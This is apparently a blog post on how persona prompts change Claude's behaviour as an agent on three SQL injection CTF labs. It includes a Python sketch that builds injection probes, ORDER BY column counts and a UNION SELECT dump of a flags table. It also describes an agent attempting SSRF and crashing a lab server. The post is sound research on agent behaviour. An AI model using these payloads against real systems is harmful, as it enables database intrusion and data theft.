I gave Claude two different personalities, kept a baseline, and set out to see how well each of them does on CTFs.
All three had the same system prompt template, with Spartan and Gandhi only having one additional sentence prepended. All of their output and behavior were logged.
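The setup can be sketched roughly like this. The exact template and persona wording aren't given in the post; the sentences below are assumptions pieced together from the "strike fast, never hesitate" and "waste no words" phrasing quoted later, and the base prompt is a placeholder.

```python
# Hypothetical sketch of the prompt setup: one shared template,
# with a single persona sentence prepended for Spartan and Gandhi.
# All strings here are illustrative guesses, not the actual prompts.

BASE_SYSTEM_PROMPT = (
    "You are an autonomous security agent. Solve the CTF lab using "
    "the tools provided and report the flag."  # placeholder template
)

PERSONAS = {
    "claude":  "",  # baseline: no extra sentence
    "gandhi":  "You are patient and methodical; reason carefully before acting. ",
    "spartan": "Strike fast, never hesitate, waste no words. ",
}

def system_prompt(persona: str) -> str:
    # The persona sentence is prepended to the shared template.
    return PERSONAS[persona] + BASE_SYSTEM_PROMPT
```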
Then I set them off against 3 SQLi labs - beginner, intermediate, and advanced.
Gandhi and (baseline) Claude solved the beginner lab in 7 and 9 steps, respectively. Spartan took 30, and failed.
Gandhi was methodical, continuously reasoning to itself about what it saw, what it thought, and how to approach the next step. It did so more deliberately than Claude, which let it find and use a basic SQLi payload to grab the flag faster than everyone else.
Spartan was weird. In the first few steps, it appeared to formulate some arbitrary plan to circumvent the log-in functionality, and then ran in circles until it exhausted its 30-step budget.
In the second-order SQLi lab, Spartan once again went off the rails. The lab app rendered with a different theme name than what the CTF description mentioned, a minor mismatch from my test setup. Gandhi and Claude both noticed the discrepancy and moved on. Spartan didn't. It decided the environment was broken and spent the majority of its 30 steps trying to find the "real" app on other ports, through Host headers, even attempting SSRF chains through the app's own link verifier. It never once tested the search feature that was right there on the page - the one with the actual vulnerability.
Meanwhile, Claude and Gandhi both solved it in 9 steps each, following nearly identical paths: find the search endpoint, confirm injection, enumerate columns, dump the flag table.
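That solve path (confirm injection, find the column count, UNION-dump the flag) can be sketched as payload construction. The parameter name, table, and column (`search`, `flags.flag`) are assumptions for illustration, not the lab's real schema.

```python
# Hypothetical sketch of the UNION-based SQLi path the agents followed.
# Builds the payload strings only; sending them to the lab is left out.

def confirm_payload(term: str) -> str:
    # Boolean probe: if results differ from a plain search, input is injectable.
    return f"{term}' AND '1'='1"

def column_count_payloads(term: str, max_cols: int = 8) -> list[str]:
    # ORDER BY n errors out once n exceeds the result's column count.
    return [f"{term}' ORDER BY {n}-- -" for n in range(1, max_cols + 1)]

def union_dump_payload(term: str, n_cols: int,
                       col: str = "flag", table: str = "flags") -> str:
    # Pad the UNION SELECT with NULLs to match the discovered column count.
    cols = [col] + ["NULL"] * (n_cols - 1)
    return f"{term}' UNION SELECT {', '.join(cols)} FROM {table}-- -"
```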
The advanced lab is where things got interesting. It's a multi-step reasoning problem across different endpoints.
Claude spent all 30 steps doing exactly that. Methodical, calm, zero frustration. But it was stuck on the wrong endpoint the entire time, still composing analysis at step 30.
Gandhi, just like in the beginner lab, was more methodical. It kept reasoning, thinking out loud. It got the flag at step 30, but missed the flag submission by a single step.
And then Spartan just solved it. It didn't overthink the second-order narrative from the CTF description. It logged in, mapped the endpoints quickly, found the real injection vector at step 19, and had the flag by step 25. No celebration. Just: "FLAG FOUND: TARANTU{...}"
So the final scoreboard looked like this: Claude and Gandhi each solved 2 out of 3. Spartan solved 1 out of 3 - but it was the only one to crack the hardest lab. No single persona solved everything.
The thing that surprised me most wasn't the solve rates. It was how differently they failed. Spartan didn't just fail more - it failed in ways the other two never did. It crashed a server with over-engineered payloads. It convinced itself the environment was broken. It spiraled. The "strike fast, never hesitate" framing didn't make it more effective - it made it more fragile.
And the persona told to "waste no words" produced 60% more text than baseline Claude. Most of it was anxious reasoning when it was stuck.
Closing thought:
Many AI users are giving their AIs different personalities, in an effort to change their output. Code, chat, whatever.
It looks like those personalities can even manifest in agentic workflows - where those AIs have access to tools and environments.
What are you going to name your AI agent?
One hundred labs available on HuggingFace and the GitHub repo.
from hacking: security in practice https://ift.tt/NOwv9yC